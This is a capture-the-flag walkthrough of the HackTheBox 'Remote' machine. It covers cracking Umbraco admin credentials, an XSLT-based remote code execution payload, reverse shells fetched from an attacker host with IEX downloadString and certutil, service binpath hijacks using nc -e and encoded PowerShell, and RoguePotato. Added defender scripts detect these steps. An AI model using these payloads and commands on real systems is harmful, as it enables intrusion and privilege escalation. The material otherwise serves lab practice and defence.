# HackTheBox - Remote

![](/files/-MZhTKIsXlpEa_vCZzkK)

### Nmap scan results

```bash
nmap -p- -A -T4 -oA nmap-remote 10.10.10.180
```

![](/files/-MZh0N2uUcF_eBekWovC)

Let's enumerate the FTP server and see if we can get any sensitive or configuration files from it.

![Epic Fail](/files/-MZh1JmGexTt69t7Vw_Q)

### Enumerating webserver (Microsoft HTTPAPI)

![](/files/-MZh1ysxI0ecwJX-onBL)

There's an [Umbraco](https://umbraco.com/) CMS (Content Management System) running. We can search for potential exploits, but first we will run a gobuster scan in the background.

> Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

```bash
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50
```

![](/files/-MZh2W5lioJwhkUVgSON)

**There are exploits available for this CMS, but first we need to determine which version is running.**

![](/files/-MZh2k_dXsvnzir8SB0L)

### Mounting the [NFS](https://www.datto.com/blog/what-is-nfs-file-share) Share

{% hint style="info" %}
**NFS**, or Network File System, is a distributed file system developed by Sun Microsystems in the early 80s that allows users to view, store, update or **share** files on a remote computer as though they were on a local one.
{% endhint %}

```bash
mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock
```

![](/files/-MZh3Q2_gEbUW27tOXdW)

![](/files/-MZh3apHzxec_nQUnaNw)

So the Umbraco CMS data, including usernames and password hashes, is stored in the **`Umbraco.sdf`** file. In the backup it is located at **`App_data/Umbraco.sdf`**.

I actually ran **strings** on the Umbraco.sdf file to get the credentials for admin. We will also need to verify the version in use: check the **`Web.config`** file.

![](/files/-MZh99f8lwPG6UbrRFct)

![](/files/-MZh4l_1WKnAEyjbDUUE)

Get the SHA-1 hash for admin and crack it using **John** or **hashcat**.
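The admin credential falls here because Umbraco stored it as an unsalted SHA-1 digest, so one pass over a wordlist checks every account at once. As an added illustration (not code from the write-up or from Umbraco), the script below audits a constructed set of SHA-1 hashes against a constructed mini wordlist, then shows the storage form a defender would want instead: a per-user random salt plus an iterated KDF (PBKDF2-HMAC-SHA256). The `admin` digest is built from the password this walkthrough uses later; the other accounts, the wordlist and the function names are assumptions for the demo.

```python
import hashlib
import secrets

# Constructed sample: usernames mapped to unsalted SHA-1 hex digests, the storage
# form this write-up recovers from Umbraco.sdf. The admin entry is derived from
# the password used later in the walkthrough; the other two are made up.
SAMPLE_HASHES = {
    "admin": hashlib.sha1(b"baconandcheese").hexdigest(),
    "editor": hashlib.sha1(b"correct horse battery staple").hexdigest(),
    "svc_backup": hashlib.sha1(b"Tr0ub4dor&3").hexdigest(),
}

# Constructed mini wordlist standing in for a file such as rockyou.txt.
SAMPLE_WORDLIST = ["password", "123456", "baconandcheese", "Tr0ub4dor&3", "umbraco"]


def find_weak_sha1(hashes_by_user, wordlist):
    """Return {user: password} for every account whose unsalted SHA-1 digest
    matches a wordlist entry.

    With no salt, one digest per candidate covers every account: build a
    reverse map digest -> users, then hash each candidate once and look it up.
    """
    reverse = {}
    for user, digest in hashes_by_user.items():
        reverse.setdefault(digest.lower(), []).append(user)
    hits = {}
    for candidate in wordlist:
        digest = hashlib.sha1(candidate.encode("utf-8")).hexdigest()
        for user in reverse.get(digest, []):
            hits[user] = candidate
    return hits


def pbkdf2_store(password, iterations=600_000):
    """Hardened storage: 16-byte random salt plus an iterated KDF, serialised
    as algorithm$iterations$salt$derived_key so it can be verified later."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute the derived key from the stored parameters and compare in
    constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return secrets.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, pw in find_weak_sha1(SAMPLE_HASHES, SAMPLE_WORDLIST).items():
        print(f"[!] {user}: stored SHA-1 matches wordlist entry '{pw}'")
    record = pbkdf2_store("baconandcheese")
    print("hardened record:", record)
    print("verify:", pbkdf2_verify("baconandcheese", record))
```

The salted record cannot be attacked with a shared reverse map: each account needs its own run of the KDF per candidate, and the iteration count makes each run expensive.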

![](/files/-MZh59pKLRxa9i0Hc9g9)

Now that we have credentials, we can try the **`(Authenticated) Remote Code Execution`** exploit.

### Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at **`http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx`**

```markup
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
  <!-- msxsl:script embeds C# that runs on the server when the visualizer
       applies the stylesheet; <cmd> and <cmd-arguments> are placeholders -->
  <msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml()
    {
        string cmd = "<cmd-arguments>";
        System.Diagnostics.Process proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "<cmd>";
        proc.StartInfo.Arguments = cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        string output = proc.StandardOutput.ReadToEnd();
        return output;
    }
  </msxsl:script>
  <xsl:template match="/">
    <xsl:value-of select="csharp_user:xml()"/>
  </xsl:template>
</xsl:stylesheet>
```

![](/files/-MZh7TBq6JuDp_ax8BYO)

![](/files/-MZh7VJlvwtGw_YUNL6K)
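From the defender's side, the visualizer page named above is a clear indicator: normal site visitors never request it, and a POST to it from a non-browser client is the RCE exchange itself. As an added example that is not part of the original write-up, the script below parses a constructed IIS W3C log excerpt and reports every request to `xsltVisualize.aspx`, grouped by client address. The log lines, the field layout (the default IIS W3C header format) and the function names are assumptions made for the demo.

```python
import re
from collections import defaultdict

# Constructed IIS W3C log excerpt (not real telemetry from the box). The
# "#Fields:" header drives the parser, so column order can vary per server.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status time-taken
2021-04-10 14:02:11 10.10.10.180 GET /umbraco/ - 80 - 10.10.14.5 Mozilla/5.0 200 15
2021-04-10 14:02:31 10.10.10.180 GET /umbraco/developer/Xslt/xsltVisualize.aspx - 80 - 10.10.14.5 python-requests/2.25.1 200 40
2021-04-10 14:02:32 10.10.10.180 POST /umbraco/developer/Xslt/xsltVisualize.aspx - 80 - 10.10.14.5 python-requests/2.25.1 200 310
2021-04-10 14:05:00 10.10.10.180 GET /index.aspx - 80 - 10.10.14.9 Mozilla/5.0 200 8
2021-04-10 14:05:02 10.10.10.180 GET /umbraco/ - 80 - 10.10.14.9 Mozilla/5.0 200 12
"""

# Page the walkthrough identifies as the vulnerable endpoint (compared case-insensitively,
# since IIS paths are case-insensitive).
XSLT_VISUALIZER = "/umbraco/developer/xslt/xsltvisualize.aspx"


def parse_w3c(text):
    """Parse IIS W3C log text into a list of dicts keyed by the #Fields names."""
    fields = None
    records = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed or truncated row; skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def find_xslt_visualize_hits(records):
    """Return the requests that touched the XSLT visualizer page."""
    return [
        r for r in records
        if r.get("cs-uri-stem", "").lower() == XSLT_VISUALIZER
    ]


def summarize_by_client(hits):
    """Group hits by client IP: {c-ip: {"requests": n, "posts": n, "agents": set}}."""
    summary = defaultdict(lambda: {"requests": 0, "posts": 0, "agents": set()})
    for r in hits:
        entry = summary[r["c-ip"]]
        entry["requests"] += 1
        if r["cs-method"].upper() == "POST":
            entry["posts"] += 1  # a POST carries the stylesheet that the server executes
        entry["agents"].add(r["cs(User-Agent)"])
    return dict(summary)


if __name__ == "__main__":
    hits = find_xslt_visualize_hits(parse_w3c(SAMPLE_IIS_LOG))
    for ip, info in summarize_by_client(hits).items():
        print(f"[!] {ip}: {info['requests']} request(s), {info['posts']} POST(s), "
              f"agents={sorted(info['agents'])}")
```

A POST from a scripted user agent with a successful status is the pattern worth alerting on; the GET alone can be an administrator opening the page in the back office.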

### Using [nishang's](https://github.com/samratashok/nishang/tree/master/Shells) PowerShell script to get a reverse shell

```bash
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"
```

![](/files/-MZhAN6VV4eJZYDPxujw)

### Running winpeas.exe (Privilege Escalation)

```powershell
certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe
```

![](/files/-MZhEYeMI6ZBNn6CFhea)

![](/files/-MZhEQBriAn-Tg7uHZfp)

> If the group "Authenticated users" has **SERVICE\_ALL\_ACCESS** in a service, then it can modify the binary that is being executed by the service. To modify it and execute **nc** you can do:

{% embed url="<https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services>" %}

```powershell
sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd /c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
```

```bash
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
```

```powershell
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc
```

![](/files/-MZhL_I1aeUprmmv9hnl)
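The binpath change above leaves a durable artifact: the service's `ImagePath` registry value is rewritten to launch `cmd.exe`/`powershell.exe` with an encoded command, which is exactly what a service modification detection should look for. As an added defender-side example (not part of the original write-up or of any tool it uses), the script below scans constructed Sysmon Event ID 13 (registry value set) records, decodes the `-EncodedCommand` argument by reversing the `iconv -t utf-16le | base64` pipeline shown above, and reports which services now point at a shell or at remote download-and-execute logic. The record layout (`Image`, `TargetObject`, `Details`), the benign noise events and the function names are assumptions; the encoded string is the one from this walkthrough.

```python
import base64
import re

# Encoded command from the walkthrough: base64(utf-16le("Iex(New-Object ...)\n")).
SAMPLE_ENCODED = (
    "SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "ZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEA"
    "NAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
)

# Constructed Sysmon EID 13 records (RegistryEvent: value set), shaped like Sysmon's
# Image / TargetObject / Details fields; not real telemetry from the box. services.exe
# is the process that writes ImagePath when sc.exe reconfigures a service.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     "Details": f"cmd.exe /c powershell.exe -EncodedCommand {SAMPLE_ENCODED}"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\Start",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 12, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\W32Time\ImagePath",
     "Details": ""},
]

SERVICE_IMAGEPATH = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
# -EncodedCommand and its documented short forms (-e, -ec, -enc), followed by base64.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)", re.IGNORECASE)
SHELL_OR_LOLBIN = re.compile(
    r"\b(cmd|powershell|pwsh|certutil|rundll32|mshta|wscript|cscript)(?:\.exe)?\b", re.I)
REMOTE_EXEC = re.compile(r"(downloadstring|downloadfile|iex\b|invoke-expression|net\.webclient)", re.I)


def decode_encoded_command(b64):
    """Reverse `iconv -t utf-16le | base64`: base64-decode, then UTF-16LE-decode."""
    return base64.b64decode(b64).decode("utf-16-le")


def inspect_image_path(value):
    """Return (reasons, decoded_command) for one ImagePath value."""
    reasons, decoded = [], None
    if SHELL_OR_LOLBIN.search(value):
        reasons.append("ImagePath launches a shell or LOLBin instead of a service binary")
    m = ENCODED_ARG.search(value)
    if m:
        try:
            decoded = decode_encoded_command(m.group(1))
            reasons.append("encoded PowerShell command present")
        except (ValueError, UnicodeDecodeError):
            reasons.append("undecodable -EncodedCommand argument")
    if decoded and REMOTE_EXEC.search(decoded):
        reasons.append("decoded command downloads and executes remote content")
    return reasons, decoded


def scan_events(events):
    """Flag EID 13 writes to a service ImagePath whose new value looks malicious."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        m = SERVICE_IMAGEPATH.search(ev.get("TargetObject", ""))
        if not m:
            continue
        reasons, decoded = inspect_image_path(ev.get("Details", ""))
        if reasons:
            findings.append({"service": m.group(1), "writer": ev.get("Image"),
                             "image_path": ev["Details"], "reasons": reasons,
                             "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[!] service {f['service']} ImagePath rewritten by {f['writer']}")
        for r in f["reasons"]:
            print("    -", r)
        if f["decoded"]:
            print("    decoded:", f["decoded"].strip())
```

Pairing this with the write-up's own observation closes the loop: the finding is only possible because `Authenticated Users` could reconfigure the service, so the fix is the service ACL, and the detection is the `ImagePath` write.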

### Trying Rogue Potato Attack

{% embed url="<https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html>" %}

Download the exploit from [here](https://github.com/antonioCoco/RoguePotato/releases/tag/1.0) and transfer it to the target machine using **`certutil.exe`**.

```powershell
certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe
```

The exploit doesn't work without a **CLSID**; the **CLSID** for the UsoSvc service can be found [here](http://ohpe.it/juicy-potato/CLSID/Windows_10_Enterprise/).

> A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

```powershell
.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"
```

![](/files/-MZhT2oSMcKgAz980cza)


